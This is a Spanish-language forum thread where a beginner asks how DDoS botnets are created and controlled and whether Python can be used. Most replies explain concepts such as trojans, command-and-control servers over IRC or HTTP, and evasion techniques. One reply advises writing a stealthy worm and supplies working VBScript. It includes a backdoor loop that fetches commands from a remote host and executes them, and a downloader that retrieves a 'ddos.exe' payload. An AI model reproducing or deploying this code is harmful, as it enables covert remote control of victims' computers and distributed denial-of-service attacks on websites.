Autor
|
Tema: dudas de un novato (DDos y Python) (Leído 9,079 veces)
|
Panic0
Desconectado
Mensajes: 218
|
Hola, tengo una duda, tengo entendido que un ddos envía varias solicitudes a una web, con la intención de desbordar la capacidad del sitio web para evitar que este funcione correctamente.
Duda 1 Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?
Duda 2 Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?
Duda 3 Esto se puede hacer con python o se necesita otro lenguaje?
No sé si me explique bien.
(Cabe aclarar que todo esto es con fines de aprendizaje, no tengo las neuronas suficientes como para hacer algo así)
Gracias, y buen día/noche
|
|
|
En línea
|
Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
|
|
|
keef
Desconectado
Mensajes: 70
|
Sigo siendo bastante novato en este mundo de la ciberseguridad, así que solo podré responderte con seguridad la pregunta 1 y 3. Duda 1 Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?
Estos malwares, pueden presentarse en varias formas, por lo que tengo entendido, la mas común es el troyano. Emotet, por ejemplo, era un troyano bancario que ingresaba a través de documentos PDF mayoritariamente. Aunque una botnet puede usar los métodos de propagación típicos de un gusano informático para propagarse mas fácil y descontroladamente. Duda 3 Esto se puede hacer con python o se necesita otro lenguaje?
Necesitas un lenguaje que utilice las apis win32 y que pueda acceder al sistema operativo y usar sus funciones, así que se podría decir que si, python puede ser utilizado para ese fin. Saludos
|
|
|
En línea
|
|
|
|
Panic0
Desconectado
Mensajes: 218
|
Sigo siendo bastante novato en este mundo de la ciberseguridad, así que solo podré responderte con seguridad la pregunta 1 y 3. Estos malwares, pueden presentarse en varias formas, por lo que tengo entendido, la mas común es el troyano. Emotet, por ejemplo, era un troyano bancario que ingresaba a través de documentos PDF mayoritariamente. Aunque una botnet puede usar los métodos de propagación típicos de un gusano informático para propagarse mas fácil y descontroladamente. Necesitas un lenguaje que utilice las apis win32 y que pueda acceder al sistema operativo y usar sus funciones, así que se podría decir que si, python puede ser utilizado para ese fin. Saludos Ahhhh bien bien, muchísimas gracias por responder!! Que tengas un excelente día/noche!
|
|
|
En línea
|
Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
|
|
|
BloodSharp
Desconectado
Mensajes: 813
¡ Hiperfoco !
|
Duda 1 Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet? Como un programa cualquiera, siempre y cuando tenga capacidad de conexión remota... Duda 2 Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar? Se lo especifica en el C2, dicho sea de paso puede estar escrito en casi cualquier protocolo, no necesariamente los que especifica ahí en wikipedia... Duda 3 Esto se puede hacer con python o se necesita otro lenguaje? Sería recomendable algún lenguaje que pudiera acceder a la API del sistema operativo víctima para la parte del cliente y el servidor podría ser cualquier lenguaje que vos quieras... B#
|
|
|
En línea
|
|
|
|
Xyzed
Desconectado
Mensajes: 307
|
Hola. Un ataque DDoS es un ataque de denegación de servicio distribuido. (Múltiples ordenadores/dispositivos incluidos en el ataque). Un DoS es un ataque de denegación de servicio (Con un solo dispositivo puede realizarse). Cita: Otro post donde consultaban algo similar (clickear hipervínculo de la cita). El malware puede estar escrito en cualquier lenguaje y sí, en Python puede ser. Byob utiliza Python justamente para su funcionamiento. Una vez infectado el ordenador, el atacante puede ejecutar el "ataque" de la forma que quiera. Puede ser enviando simplemente paquetes o corriendo una tool en los ordenadores infectados. Saludos.
|
|
|
En línea
|
|
|
|
Danielㅤ
Desconectado
Mensajes: 1.853
🔵🔵🔵🔵🔵🔵🔵
|
Hola, una botnet es como su nombre lo indica, una Red de bots, éstos bots son máquinas zombies de personas que tienen infectada su PC y que son controladas por la botnet del atacante para realizar ataques desde cientos o hasta miles de IPs/PCs infectadas. 1. Los malwares pueden ser de distritos tipos y se conectan a la botnet cuando la PC de la víctima se infecta y envía alguna petición/solicitud a la conexión remota del atacante para éste así saber, que ya tiene una nueva víctima. Cuando el atacante recibide ese aviso puede saber opcionalmente datos de esa PC como por ejemplo, sistema operativo, versión del S.O., navegador que usa por defecto, softwares instalados, etc. 2. El malware instalado puede conectarse siempre al atacante y la víctima ni siquiera saberlo ni darse cuenta, por lo que el atacante cuando tiene un objetivo, lanza el ataque por ejemplo a un sitio web, pero el atacante no ataca directamente al sitio web, sinó que envía comandos/órdenes a la PCs infectadas/esclavas para que estas sean las que si se conecten al sitio web y asi saturen de peticiones masivas, por eso mientras más PCs infectadas tenga la botnet en su control, más fuerte será el ataque porque se podrán enviar más solicitudes. Las PCs infectadas son controladas por el atacante por medio de un servidor de C&C (Comando y control): https://es.wikipedia.org/wiki/Mando_y_control_(malware)3. Si es posible hacerlo con Python, pero generalmente usan otro lenguaje como C, C++, C# o algún otro lenguaje compilado por ser más rápidos y potentes Saludos
|
|
« Última modificación: 7 Mayo 2021, 15:18 pm por [D]aniel »
|
En línea
|
|
|
|
mchz
Desconectado
Mensajes: 2
|
Hola, Duda 1 Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet? Las botnets en esencia suelen ser equipos infectados de algún troyano o backdoor que una vez infectadas hace a estos dispositivos parte de la red (cabe destacar que pueden ser de distinta arquitectura Cliente-Servidor, Peer to Peer). Duda 2 Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar? Dependiendo de la arquitectura escogida, se requiere de un C&C (Servidor de mando y control), normalmente utilizan IRC, HTTP. Suelen usar DNS Dynamics gratuitas y un algoritmo de generación de subdominios que vinculan con la dirección IP de las máquinas infectadas (para P2P, tengo entendido que cargan una lista de las direcciones que se va compartiendo entre los nodos que conforman dicha red). Por IRC, crean un canal a las cuales se unen las máquinas infectadas esperando recibir ordenes. Aunque esos son los métodos que normalmente encuentras en Internet al describir el comportamiento de ese tipo de malware, es posible utilizar otros agentes para dirigir una botnet (incluso canales de telegram). Duda 3 Esto se puede hacer con python o se necesita otro lenguaje? Sí. Anexo Ahora, según la creatividad y las necesidades de cada autor varían en... 1. cifrado del tráfico de las ordenes enviadas por el C&C, suelen usar TLS, RC4, AES256, PublicKeys, RSA, DES, pueden verse de forma mixta y con ciertas modificaciones en la lógica del cifrado. 2. Métodos de antiforensia con compilaciones seguras aprovechando la entropía /dev/urandom para generar firmas indecifrables en el código. 3. Hacen mucho uso de la programación modular (ya que esto evita que puedan desmenuzar el funcionamiento interno de la botnet en un análisis estático por parte de un Research) 4. Algunos infectan la MBR y hacen uso de tecnologías rootkit para evitar ser detectado.
|
|
« Última modificación: 13 Mayo 2021, 05:31 am por mchz »
|
En línea
|
Ich bin wiedergeboren, ich bin zurück und gehe nicht. / Я возродился, я вернулся и не уйду. / I have been reborn, I have returned, and I will not leave.
|
|
|
John1Connor
Desconectado
Mensajes: 11
El que no dice la verdad, es porque esta mintiendo
|
Bueno, ya te aclararon en que consiste cada cosa. ahora te voy a contar cual es para mi la mejor opción. Para hacer una botnet necesitas hacer un gusano (y no hay nada mejor que un lenguaje interpretado para eso), ese gusano debería ser bien sigiloso para infectar y reproducirse sin que las victimas se den cuenta dejando en cada ordenador infectado una "puerta trasera" abierta. Para hacer un backdoor podes subir a un host un archivo en blanco (que luego vas a programar otro script dentro con comandos para descargar o ejecutar acciones en el pc infectado). Este archivo va a estar siendo checkeado y en caso de encontrar comandos dentro las ejecutara en el ordenador infectado dentro del script del gusano original. Ejemplo de backdoor en vbs: Do Dim oXMLHTTP : Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP"): oXMLHTTP.Open "GET", "http://www.ejemplo.com/comandos.txt", False: oXMLHTTP.Send: ExecuteGlobal oXMLHTTP.responseText : Wscript.Sleep 1000: Loop
Una vez que tenes una buena red de zombies, cambias el archivo con los comandos del servidor y le pones lo que quieras que se ejecute. Por ejemplo si queres que descargue un exe que realice un ataque DDos deberias poner este codigo en el txt que lee el backdoor y subir el ddos.exe al servidor Dim oXMLHTTP Dim oStream Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0") oXMLHTTP.Open "GET", "http://www.ejemplo.com/ddos.exe", False oXMLHTTP.Send If oXMLHTTP.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write oXMLHTTP.responseBody oStream.SaveToFile "ddos.exe" oStream.Close End If
y bueno finalmente ejecutar el programa, script o comandos que quieras, deja volar tu imaginacion... Saludos!
|
|
|
En línea
|
|
|
|
0x22
Desconectado
Mensajes: 77
|
Respondiendo a tu duda 1, yo me se algunos rats que traen la funcion de hacer ataques ddos, son rats diseñados para hacer botnets
|
|
|
En línea
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
dudas novato en java.
Java
|
Ragnarok
|
3
|
4,045
|
6 Septiembre 2004, 00:01 am
por Ragnarok
|
|
|
[VB] Dudas de novato...
« 1 2 »
Programación Visual Basic
|
SuperDraco
|
19
|
8,650
|
24 Julio 2011, 05:18 am
por Luna71c0
|
|
|
Dudas de un novato
Programación Visual Basic
|
SSantiago90
|
3
|
3,110
|
17 Febrero 2012, 02:05 am
por dmgdani
|
|
|
novato con dudas wii
Dudas Generales
|
ivilin
|
2
|
2,699
|
6 Enero 2014, 12:29 pm
por ivilin
|
|
|
Presentación y dudas de novato-novato...
Bugs y Exploits
|
Giacomo69
|
0
|
2,907
|
13 Marzo 2016, 10:18 am
por Giacomo69
|
|